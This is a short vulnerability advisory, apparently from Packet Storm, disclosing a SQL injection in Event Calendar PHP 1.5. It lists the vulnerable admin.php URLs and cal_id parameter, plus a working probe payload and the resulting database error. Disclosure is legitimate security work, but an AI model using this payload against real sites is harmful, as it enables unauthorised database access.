Event Calendar PHP version 1.5 suffers from a remote SQL injection vulnerability.
90cae4bf5c5fd8cc1c2accede370cf72c3ce0cc770fafdaf435dac78861f849f=====================================================
# Event Calendar PHP 1.5 - SQL Injection
=====================================================
# Vendor Homepage: http://eventcalendarphp.com/
# Date: 21 Oct 2016
# Demo Link : http://eventcalendarphp.com/eventcalendar/admin.php
# Version : 1.5
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# PoC:
Vulnerable Url:
http://eventcalendarphp.com/eventcalendar/admin.php?act=options&cal_id=[payload]
http://eventcalendarphp.com/eventcalendar/admin.php?act=cal_options&cal_id=[payload]
http://eventcalendarphp.com/eventcalendar/admin.php?act=cal_language&cal_id=[payload]
Vulnerable parameter : cal_id
Mehod : GET
A simple inject :
Payload : '+order+by+20--+
http://eventcalendarphp.com/eventcalendar/admin.php?act=options&cal_id=1'+order+by+20--+
In response can see result :
query error: SELECT * FROM pa_ecal_calendars WHERE cal_id='1' order by
20-- '. Error: Unknown column '20' in 'order clause'
Result of payload: Error: Unknown column '20' in 'order clause'
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed